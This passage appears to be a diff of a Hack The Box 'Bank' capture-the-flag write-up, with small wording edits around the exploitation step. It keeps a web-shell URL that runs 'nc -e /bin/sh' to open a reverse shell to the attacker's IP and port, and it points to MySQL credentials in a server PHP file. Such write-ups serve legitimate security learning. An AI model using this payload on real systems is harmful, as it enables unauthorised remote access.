Kyuu-Ji/htb-write-up/bank/write-up-bank.md

 http://bank.htb/uploads/logo.htb?cmd=nc%20-e%20/bin/sh%2010.10.14.23%209001
 ```

-After a short while the the request gets sent to my listener that waits for connections on my IP and port 9001 and we started a reverse shell as www-data!
+After a short while the the request gets sent to my listener that waits for connections on my IP and port 9001 and started a reverse shell as www-data!

 ## Privilege Escalation

-When looking at the PHP files from the server, we find credentials for MySQL in the file **/var/www/bank/inc/user.php**:
+When looking at the PHP files from the server, there are credentials for MySQL in the file **/var/www/bank/inc/user.php**:
 ```php
 # (...)
 function getUsername($email){